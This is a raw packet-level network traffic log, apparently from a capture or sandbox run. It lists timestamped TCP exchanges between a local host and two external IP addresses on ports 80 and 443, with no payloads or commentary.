Dec 13, 2024 18:53:53.201217890 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.201384068 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.202728033 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.202763081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.202827930 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.203877926 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.203982115 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.323247910 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.323405981 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.323501110 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.323918104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.324032068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.324059010 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.324083090 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.324110031 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.325089931 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.325149059 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.325176001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.325201035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.325225115 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.325244904 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.326041937 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.326122046 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.326145887 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.326193094 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.327182055 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.327230930 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.327296972 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.327358007 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.328231096 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.328258038 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.328310966 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.329216957 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.329241037 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.329266071 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.329298019 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.330112934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.330173016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.330235958 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.331156969 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.331207037 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.331294060 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.331368923 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.332310915 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.332355976 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.332458973 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.332500935 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.333165884 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.333235025 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.333321095 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.333372116 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.334196091 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.334245920 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.334287882 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.334340096 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.335272074 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.335335016 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.335402012 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.335450888 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.336311102 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.336358070 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.336369991 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.336416960 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.337364912 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.337380886 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.337416887 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.337450027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.338483095 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.338498116 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.338531971 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.338565111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.339502096 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.339548111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.339587927 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.339587927 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.340341091 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.340367079 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.340419054 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.341358900 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.341381073 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.341434956 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.341434956 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.342411995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.342428923 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.342473984 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.342474937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.343367100 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.343384027 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.343429089 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.343430042 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.344403982 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.344420910 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.344466925 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.344466925 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.345469952 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.345487118 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.345534086 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.346333981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.346393108 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.346451044 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.346506119 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.347364902 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.347423077 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.347462893 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.347513914 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.348439932 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.348496914 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.349462032 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.349478960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.349497080 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.349512100 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.349554062 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.349555016 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.350940943 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.350959063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.351015091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.351016045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.352190018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.352210045 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.352251053 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.352282047 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.353115082 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.353132963 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.353174925 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.353174925 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.353658915 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.353718042 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.353760958 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.353807926 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.354511976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.354528904 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.354573965 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.354604006 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.355695009 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.355711937 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.355756998 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.355802059 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.356453896 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.356508017 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.356797934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.356858969 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.357496977 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.357561111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.357861042 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.357985973 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.358639956 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.358656883 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.358711958 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.359644890 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.359661102 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.359713078 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.360614061 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.360630035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.360676050 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.360707998 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.361699104 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.361716032 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.361749887 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.361780882 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.362790108 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.362807035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.362850904 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.362850904 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.363933086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.364200115 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.364259958 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.364901066 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.364918947 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.364957094 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.364957094 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.365812063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.365828991 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.365876913 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.366731882 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.366748095 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.366797924 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.367732048 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.367749929 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.367798090 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.367799044 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.368745089 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.368762016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.368833065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.369683027 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.369745016 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.369790077 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.369837046 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.370755911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.370773077 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.370816946 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.370816946 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.371670961 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.371721983 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.371808052 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.371860981 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.372800112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.372816086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.372868061 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.372899055 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.373902082 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.373918056 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.373960018 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.373960018 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.374870062 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.374886036 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.374922037 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.374922037 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.375818968 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.375835896 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.375874996 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.375874996 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.508996010 CET	443	49922	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:53.509071112 CET	49922	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:53.509428978 CET	49922	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:53.509442091 CET	443	49922	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:53.511269093 CET	49922	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:53.511282921 CET	443	49922	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:53.518887043 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.519038916 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.519165993 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.519165993 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.519280910 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.519397020 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.519476891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.519550085 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.520297050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.520412922 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.520462990 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.521344900 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.521403074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.521495104 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.521616936 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.522376060 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.522437096 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.522474051 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.522525072 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.523296118 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.523350000 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.523435116 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.523483992 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.524298906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.524348974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.524385929 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.524435043 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.525367975 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.525418043 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.525438070 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.525484085 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.526448965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.526571035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.526582956 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.526618004 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.527540922 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.527595997 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.527686119 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.527812004 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.528568029 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.528626919 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.528738976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.528871059 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.529875040 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.529933929 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.529983997 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.530035019 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.530945063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.531023026 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.531075001 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.531985044 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.532042027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.532085896 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.532131910 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.532974958 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.533029079 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.533122063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.533185005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.533993959 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.534045935 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.534090042 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.534148932 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.535152912 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.535202026 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.535295963 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.535346985 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.536104918 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.536156893 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.536237955 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.536290884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.536916971 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.536983013 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.537067890 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.537122011 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.537915945 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.537976027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.538022041 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.538075924 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.538789988 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.538868904 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.538933992 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.538990974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.539694071 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.539856911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.539910078 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.540666103 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.540724039 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.540821075 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.540882111 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.541676998 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.541728020 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.541778088 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.541829109 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.542610884 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.542665005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.542901039 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.542970896 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.543715954 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.543796062 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.543809891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.543864965 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.544589996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.544640064 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.544699907 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.544749975 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.545674086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.545830965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.545882940 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.546653032 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.546782017 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.546838045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.546838045 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.547709942 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.547760963 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.547828913 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.547878027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.548847914 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.548899889 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.549125910 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.549176931 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.549793959 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:53.549848080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:53.549889088 CET	80	49917	31.41.244.11	192.168.2.7
